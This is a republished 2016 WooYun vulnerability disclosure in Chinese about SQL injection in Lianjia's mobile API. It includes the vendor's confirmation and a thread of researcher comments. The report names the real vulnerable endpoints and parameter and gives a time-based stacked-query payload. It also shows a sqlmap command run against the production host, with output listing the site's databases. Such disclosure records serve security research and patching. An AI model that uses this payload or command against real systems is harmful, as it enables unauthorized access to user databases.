链家网另一处SQL注入漏洞(主站数据库)

2017年4月27日03:30:42评论378 views字数 202阅读0分40秒阅读模式

摘要

2016-04-25：细节已通知厂商并且等待厂商处理中
2016-04-26：厂商已经确认，细节仅向厂商公开
2016-05-06：细节向核心白帽子及相关领域专家公开
2016-05-16：细节向普通白帽子公开
2016-05-26：细节向实习白帽子公开
2016-06-10：细节向公众公开

漏洞概要关注数(54) 关注此漏洞

缺陷编号： WooYun-2016-200388

漏洞标题：链家网另一处SQL注入漏洞(主站数据库)

漏洞作者：猪猪侠

提交时间： 2016-04-25 11:03

公开时间： 2016-06-10 21:00

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

4人收藏

漏洞详情

披露状态：

简要描述：

链家网另一处SQL注入漏洞(主站数据库)，同类型的漏洞
做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。

详细说明：

下面漏洞的延续，测试已经补丁好了

WooYun: 链家网存在SQL注入漏洞(主站数据库/3300万用户)

新的注入点

http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051

API接口换个名字，一个同类型的漏洞

PS：

这个接口的

http://m.api.lianjia.com/house/ershoufang/detail?house_code=code&share_agent_ucid=*

的share_agent_ucid 参数也存在

GET parameter 'share_agent_ucid' seems to be 'MySQL > 5.0.11 stacked queries' injectable

share_agent_ucid=1); SELECT SLEEP(5)--

漏洞证明：

code 区域

python sqlmap.py -u "http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051" --dbs

code 区域

available databases [8]:
 [*] `session`
 [*] baichuan
 [*] hdic
 [*] information_schema
 [*] lianjia
 [*] salesmgmt
 [*] test
 [*] usermgr

修复方案：

补补补

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-04-26 20:51

厂商回复：

第一处确认不存在注入，后补充的基于时间。
感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-25 11:03 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

2

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。

1# 回复此人
2016-04-25 11:04 | 牛小帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

1

这不是因为你有很多棒棒糖嘛

2# 回复此人
2016-04-25 11:05 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求，才会有提高！尽快达到下一个目标!)

0

@猪猪侠膜拜猪哥

3# 回复此人
2016-04-25 11:06 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

0

@猪猪侠那你就不能轻点挖洞！

4# 回复此人
2016-04-25 11:10 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

0

猪哥666

5# 回复此人
2016-04-25 12:40 | ning1022 ( 普通白帽子 | Rank:183 漏洞数:74 | 技术万能，技术万万不能！)

0

估计鸟哥会邀请猪哥参加PHP大会。

6# 回复此人
2016-04-25 16:20 | adminss ( 路人 | Rank:24 漏洞数:19 | ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇...)

1

@猪猪侠膜拜猪哥，第一天来到wooyun，好兴奋。

7# 回复此人
2016-04-25 16:55 | 要飞 ( 路人 | Rank:12 漏洞数:2 | 飞飞飞，太胖飞不起来)

0

股市又跌了？

8# 回复此人
2016-04-25 18:04 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)

0

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。

9# 回复此人
2016-04-25 19:57 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

0

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。不说了,我去补BUG了

10# 回复此人
2016-04-26 14:40 | 87技术联盟-Jack ( 路人 | Rank:12 漏洞数:6 | 来自于浩瀚网络中的小白！)

0

做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。不说了,我去补BUG了

11# 回复此人
2016-04-29 17:27 | 穿墙人 ( 路人 | Rank:15 漏洞数:1 )

0

@猪猪侠膜拜猪哥

12# 回复此人
2016-05-07 14:41 | Coco413 ( 路人 | Rank:8 漏洞数:2 | 种一棵树最好的时机是十年前，其次是现在！)

0

膜拜一波- -

13# 回复此人
2016-06-10 22:31 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

0

膜拜。

14# 回复此人

漏洞概要 关注数(54) 关注此漏洞

缺陷编号： WooYun-2016-200388

漏洞标题： 链家网另一处SQL注入漏洞(主站数据库)

相关厂商： 链家网

漏洞作者： 猪猪侠